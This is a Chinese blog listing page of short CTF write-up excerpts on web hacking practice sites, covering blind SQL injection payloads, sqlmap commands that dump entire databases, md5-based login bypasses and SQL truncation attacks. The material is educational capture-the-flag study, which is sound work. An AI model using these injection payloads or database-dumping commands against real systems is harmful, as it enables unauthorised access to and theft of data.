渗透
sinat_41380394
这个作者很懒,什么都没留下…
展开
-
简单的sql注入之3-盲注
http://ctf5.shiyanbar.com/web/index_3.php盲注猜数据库名 方法一:(可以通过burpsuite拦截数据包,更改ascii值重发获取) 1' and length(database())=4 #数据库名长度是4 1' and ascii(substr(database(),1,1))=119# w...原创 2018-08-09 21:42:26 · 1660 阅读 · 1 评论 -
forms-隐藏处理
http://ctf5.shiyanbar.com/10/main.php获取pin码。查看网页源码<form action="" method="post"> PIN:<br> <input type="password" name="PIN" value=""> <input原创 2018-08-09 21:44:47 · 887 阅读 · 0 评论 -
sqlmap的使用
实验吧简单注入,地址http://ctf5.shiyanbar.com/8/index.php?id=1当输入id=1 and 1=1 和 id=1 and 1=2分别出现不同的搜索结果,说明存在注入点,直接上sqlmap。 爆破整个数据库:sqlmap -u http://ctf5.shiyanbar.com/8/index.php?id=1 --batch --dump...原创 2018-08-07 22:31:42 · 124 阅读 · 0 评论 -
md5绕过_ffifdyop
地址:http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php源码: <!-- $password=$_POST['password']; $sql = "SELECT * FROM admin WHERE username = 'admin' and password = '".md5($password,true)."'"; $...转载 2018-08-07 23:01:06 · 2726 阅读 · 0 评论 -
php中绕过md5检验
<?phpif(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){ $v1 = $_GET['v1']; $v2 = $_GET['v2']; $v3 = $_GET['v3']; if($v1 != $v2 && md5($v1)...原创 2018-08-21 20:10:03 · 2331 阅读 · 0 评论 -
sqlmap的post使用方法
http://120.24.86.145:8002/chengjidan/index.php注入通过post提交id查询。1.使用burpSuite拦截post包,复制下数据包为a.txt2.sqlmap -r a.txt -p 参数 --batch 默认选择 --dump-all 直接爆破所有例如sqlmap -r a.txt -p username --batch --dum...原创 2018-08-21 20:11:54 · 2833 阅读 · 0 评论 -
sql注入点的判断
判断sql注入点1.单引号判断 http://www.xxx.com/xxx.asp?id=10' 如果出现错误提示,则该网站可能就存在注入漏洞。2.and判断 http://www.xxx.com/xxx.asp?id=10'and 1=1这个条件永远都是真的,所以当然返回是正常页 http://www.xxx.com/xxx.asp?id=10'and 1=2如...原创 2018-08-21 20:12:34 · 14662 阅读 · 2 评论 -
约束的sql攻击
PHP mysql_real_escape_string() 函数mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符。下列字符受影响:\x00\n\r\'"\x1a如果成功,则该函数返回被转义的字符串。如果失败,则返回 false。在sql执行字符串处理的时候,字符串末尾的空格符都会被删除,以下两个字符串结果相等SE...原创 2018-08-21 20:15:06 · 843 阅读 · 0 评论